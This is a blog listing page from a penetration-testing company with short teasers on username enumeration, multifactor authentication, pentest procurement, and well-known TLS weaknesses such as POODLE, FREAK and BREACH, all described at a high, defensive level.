Contact us: info@akimbocore.com

Preventing Username Enumeration

Published: 01 December 2022    Last Updated: 01 December 2022

First of all, what is username enumeration? It is when a web application has a feature that allows a user to supply a username and the application will disclose (not necessarily intentionally) if the username is valid or not. This is closely related to Username Disclosure, except in the latter the application is including valid usernames in server responses in some way, which allows an attacker to determine a username is valid without having to specify it first themselves. Both of these are an issue and both should be addressed.


Continue Reading

Multifactor Authentication (MFA)

Published: 09 November 2022    Last Updated: 11 November 2022

An authentication factor is something that is supplied to verify an identity – the most common example of an authentication factor is a password, a secret word used to authenticate yourself for access to an account. Multi-factor authentication is the requirement to supply several factors during authentication. This is often called “Two Factor Authentication” (2FA) as, most commonly, two factors are required, but it could, in some instances, be more and so MFA is the more general term.


Continue Reading

Small Business E-commerce: How do I prevent my site getting hacked?

Published: 02 November 2022    Last Updated: 04 November 2022

With modern platforms such as WordPress, WooCommerce, Magento, and Shopify, it’s now easier than ever to create an online store. However, many online retailers are not cybersecurity experts and might not be sure where to get started with securing their site.


Continue Reading

Penetration Testing: Mix it up or stick with it?

Published: 02 November 2022    Last Updated: 03 November 2022

After publishing yesterday’s article about how frequently you should get a penetration test, I inadvertently started a discussion on Twitter about another aspect of penetration testing delivery: Should you change providers, or you should stick with who you know?


Continue Reading

Selecting a PenTest Provider – Making a Good Decision

Published: 28 October 2022    Last Updated: 03 November 2022

Choosing a PenTesting provider can be difficult, how do you know if they’re good at what they do and they’ll make working together easy? Perhaps you have a provider already, but they’ve not lived up to your expectations.

Since choosing a testing provider is a critical part of your cybersecurity strategy, we’ve added a few things to consider here. We’re also available for advice and help if you’ve got questions about testing in general or how to get started with your strategy.


Continue Reading

Penetration Testing: how often should you test?

Published: 28 October 2022    Last Updated: 03 November 2022

The truth is, it’s very unlikely you’ll even get a strong answer from an organisation as to how frequently you should test. Even organisations like the NCSC, who offer guidance to UK businesses on how to stay secure, don’t give a direct answer to the question. However, they may comment on other businesses behaviour such as saying “it’s not uncommon for a year or more to elapse between penetration tests” before commenting that this is likely insufficient.


Continue Reading

Penetration Testing: how do you get the most from your budget?

Published: 27 October 2022    Last Updated: 03 November 2022

Tips and tricks to make the most of your penetration testing budget. We suggest practical ways to obtain the best value for your spend.


Continue Reading

How Can I Turn PenTesting from a Cost into a Competitive Advantage?

Published: 27 October 2022    Last Updated: 03 November 2022

Turn Penetration Testing from a cost to a competitive advantage using customer retention, legal compliance and modern business practices in your favour.


Continue Reading

Sweet32

Published: 27 October 2022    Last Updated: 03 November 2022

Sweet32 describes a birthday attack on 64-bit block ciphers. This attack has been demonstrated against both 3DES and Blowfish, against both VPNs as well as HTTPS traffic. This attack allows an attacker who can perform an interception attack to decrypt small amounts of ciphertext, such as session tokens and other sensitive cookie values.


Continue Reading

Lucky 13

Published: 25 October 2022    Last Updated: 03 November 2022

Lucky 13 is a padding oracle vulnerability against CBC-mode ciphers in TLS that utilises a timing side-channel. This issue is due to a flaw within the SSL/TLS specification and is not implementation specific, however implementations may be able to harden against exploitation of this issue and prevent exploitation by removing the timing side-channel.


Continue Reading

CBC-mode Ciphers

Published: 25 October 2022    Last Updated: 03 November 2022

The use of Cipher Block Chaining (CBC) mode ciphers is “discouraged”. This term is used as these cipher suites have not been formally deprecated but have effectively been superseded. For example, later version of Transport Layer Security support more secure cipher mode options such as Galois/Counter Mode (GCM) ciphers. Additionally, CBC-mode ciphers have had a series of vulnerabilities such as Lucky13, Zombie POODLE, GOLDENDOODLE, 0-Length OpenSSL, and Sleeping POODLE.


Continue Reading

Padding Oracle On Downgraded Legacy Encryption (POODLE)

Published: 25 October 2022    Last Updated: 03 November 2022

Padding Oracle On Downgraded Legacy Encryption (POODLE) is an attack against SSLv3.0. It exploits two aspects of SSLv3.0. The first aspect involves an attacker performing an interception attack and modify network traffic between a client and server, downgrading the connection to SSLv3.0. The second aspect is a padding oracle issue with block ciphers in cipher-block chaining mode in SSLv3.0 which allows an attacker to decrypt small amounts of ciphertext within messages, such as session tokens and confidential cookie values.


Continue Reading

Factoring RSA Export Keys (FREAK)

Published: 21 October 2022    Last Updated: 03 November 2022

Factoring RSA Export Keys (FREAK) is an attack against “export ciphers suites” which are cipher suites that have intentionally limited security due to prior regulation within the United States. This regulation placed restrictions on the strength of encryption algorithms used in software for exportation. This attack was demonstrated in 2015 and can allow an attacker who is able to perform an interception attack against HTTPS traffic to decrypt message contents.


Continue Reading

RC4 NOMORE

Published: 21 October 2022    Last Updated: 03 November 2022

An attack against RC4 was demonstrated in 2015. This attack affects the use of RC4 in several protocols, including within Transport Layer Security (TLS) used by web browsers and web applications but also within WPA-TKIP used by wireless networks. This weakness in RC4 when applied to TLS can allow an attacker to decrypt a small amount of repeated content, such as a session token or other sensitive cookie values.


Continue Reading

Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext (BREACH)

Published: 21 October 2022    Last Updated: 03 November 2022

Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext (BREACH) is a vulnerability similar in nature to CRIME, but where CRIME affected TLS/SPDY compression, BREACH affects HTTP compression. Where an application supports HTTP compression, reflects user-input within response bodies, and includes confidential information in that body – such as a CRSF token, it may be affected by BREACH. This attack was demonstrated as practical in 2013.


Continue Reading